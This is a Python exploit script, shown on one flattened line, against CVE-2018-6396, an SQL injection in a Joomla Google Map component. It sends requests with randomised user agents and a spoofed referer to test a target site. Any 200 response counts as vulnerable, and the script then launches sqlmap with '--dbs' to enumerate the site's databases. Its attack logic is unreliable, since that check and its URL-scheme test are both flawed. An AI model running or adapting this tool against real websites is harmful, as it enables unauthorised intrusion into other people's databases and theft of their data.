#!/usr/bin/python3 #IMPORTS import os import sys import random import requests import argparse #CLASS class Colors: BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' WHITE = '\033[37m' #Class from https://raw.githubusercontent.com/ankayip41/random-user-agent/master/ua.py class UserAgent: agent = {} def random(self): self.get_platform() self.get_os() self.get_browser() if self.agent['browser'] == 'Chrome': webkit = str(random.randint(500, 599)) version = "%s.0%s.%s"%(str(random.randint(0, 24)), str(random.randint(0, 1500)), str(random.randint(0, 999))) return "Mozilla/5.0 (%s) AppleWebKit/%s.0 (KHTML, like Gecko) Chrome/%s Safari/%s"%(self.agent['os'], webkit, version, webkit) elif self.agent['browser'] == 'Firefox': year = str(random.randint(2000, 2015)) month = str(random.randint(1, 12)).zfill(2) day = str(random.randint(1, 28)).zfill(2) gecko = "%s%s%s"%(year, month, day) version = "%s.0"%(str(random.randint(1, 15))) return "Mozilla/5.0 (%s; rv:%s) Gecko/%s Firefox/%s"%(self.agent['os'], version, gecko, version) elif self.agent['browser'] == 'IE': version = "%s.0"%(str(random.randint(1, 10))) engine = "%s.0"%(str(random.randint(1, 5))) option = random.choice([True, False]) if option: token = "%s;"%(random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64'])) else: token = '' return "Mozilla/5.0 (compatible; MSIE %s; %s; %sTrident/%s)"%(version, self.agent['os'], token, engine) def get_os(self): if self.agent['platform'] == 'Machintosh': self.agent['os'] = random.choice(['68K', 'PPC']) elif self.agent['platform'] == 'Windows': self.agent['os'] = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE']) elif self.agent['platform'] == 'X11': self.agent['os'] = random.choice(['Linux i686', 'Linux x86_64']) def get_browser(self): self.agent['browser'] = random.choice(['Chrome', 'Firefox', 'IE']) def get_platform(self): self.agent['platform'] = random.choice(['Machintosh', 'Windows', 'X11']) #GLOBAL VARS UA = UserAgent() HOST = "" URL = "" ARGS = "" P = "/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=1" #FUNCTIONS def banner(): os.system("clear") print(Colors.BLUE + Colors.BOLD + """ _______ _______ ______ __ __ ______ _______ _______ _______ _______ _______ | | | _ | | |/ | __ \ | | | |_ _| ___| __| | | | ---| <| __/ | | | | | | ___|__ | |___|___|___|___|______|__|\__|___| |_______|__|____| |___| |_______|_______| ==================[ Javier Olmedo - contacto@hackpuntes.com ]================== https://hackpuntes.com https://twitter.com/jjavierolmedo [03/03/2018] Discovered by: @ihsansencan Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection Exploit CVE-2018-6396 """ + Colors.ENDC) def usage(): print(""" EXAMPLE: -u [REQUIRED] Specify the URL of the target to attack python3 joomla-cve-2018-6396.py -u """) def parserArguments(): global ARGS parser = argparse.ArgumentParser() parser._action_groups.pop() required = parser.add_argument_group('required arguments') required.add_argument("-u", help="specify the URL of the target to attack") ARGS = parser.parse_args() def randomString(size): out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def isVulnerable(): global HOST global UA global URL global P formatTarget() headers = { 'User-Agent': UA.random(), 'Cache-Control': 'no-cache', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)), 'Keep-Alive': str(random.randint(110,120)), 'Connection': 'keep-alive' } URL = HOST + P r = requests print(Colors.BOLD + Colors.GREEN + "[+]" + " Checking if " + Colors.YELLOW + HOST + Colors.GREEN + " is vulnerable" + Colors.ENDC) try: r = requests.get(URL, headers=headers, timeout=10) except Exception as e: r.status_code = 500 pass if(r.status_code == 200): return True else: return False def formatTarget(): global HOST if(HOST[-1:] == "/"): HOST = HOST[:-1] if(HOST[:7] != "http://" or HOST[:8] != "https://"): option = True print(Colors.BOLD + Colors.GREEN + "[1]" + Colors.YELLOW + " http://" + HOST + Colors.ENDC) print(Colors.BOLD + Colors.GREEN + "[2]" + Colors.YELLOW + " https://" + HOST + Colors.ENDC) print() while option: myTarget = input(Colors.BOLD + Colors.YELLOW + "[!]" + Colors.WHITE + " Select your " + Colors.RED + "TARGET: " + Colors.GREEN) if(myTarget == "1"): HOST = "http://" + HOST option = False elif(myTarget == "2"): HOST = "https://" + HOST option = False else: sys.stdout.write("\033[F") sys.stdout.write("\033[K" + Colors.ENDC) print() #MAIN if __name__ == "__main__": banner() usage() parserArguments() if(ARGS.u): HOST = ARGS.u if(isVulnerable()): print(Colors.BOLD + Colors.GREEN + "[+]" + " TARGET " + Colors.YELLOW + HOST + Colors.GREEN + " VULNERABLE!! :)" + Colors.ENDC) print() print(Colors.BOLD + Colors.GREEN + "[+]" + " LAUNCHING ATTACK SQLi with SQLmap!!" + Colors.ENDC) c = 'sqlmap -u "'+URL+'" -p map --dbs' os.system(c) else: print(Colors.BOLD + Colors.RED + "[-]" + " TARGET " + Colors.YELLOW + HOST + Colors.RED + " NOT VULNERABLE!! :(" + Colors.ENDC) print() sys.exit(1) else: print(Colors.BOLD + Colors.RED + "[!] " + "Arguments not found!!" + Colors.ENDC) print("") sys.exit(1)